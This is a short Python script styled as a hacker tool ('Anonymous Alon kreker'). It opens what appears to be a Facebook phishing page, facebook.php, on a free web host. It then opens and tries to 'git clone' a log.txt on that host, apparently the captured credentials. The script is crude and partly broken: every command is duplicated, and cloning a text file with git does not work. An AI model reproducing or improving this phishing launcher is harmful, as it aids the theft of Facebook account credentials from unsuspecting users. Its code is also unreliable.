import os, sys, time
from os import  system
from time import sleep
os.system("color A")
print("~~" * 50)
print("                                    Anonymous Alon kreker    ")
time.sleep(50)
os.system("cls")
system("clear")
print("~~" * 50)
system("start https://helppopol.000webhostapp.com/facebook.php")
os.system("start https://helppopol.000webhostapp.com/facebook.php")
print("~~" * 50)
time.sleep(50)
print("~~" * 50)
os.system("start https://helppopol.000webhostapp.com/log.txt")
system("start https://helppopol.000webhostapp.com/log.txt")
print("~~" * 50)
time.sleep(50)
print("~~" * 50)
os.system("git clone https://helppopol.000webhostapp.com/log.txt")
system("git clone https://helppopol.000webhostapp.com/log.txt")
print("~~" * 50)
time.sleep(50)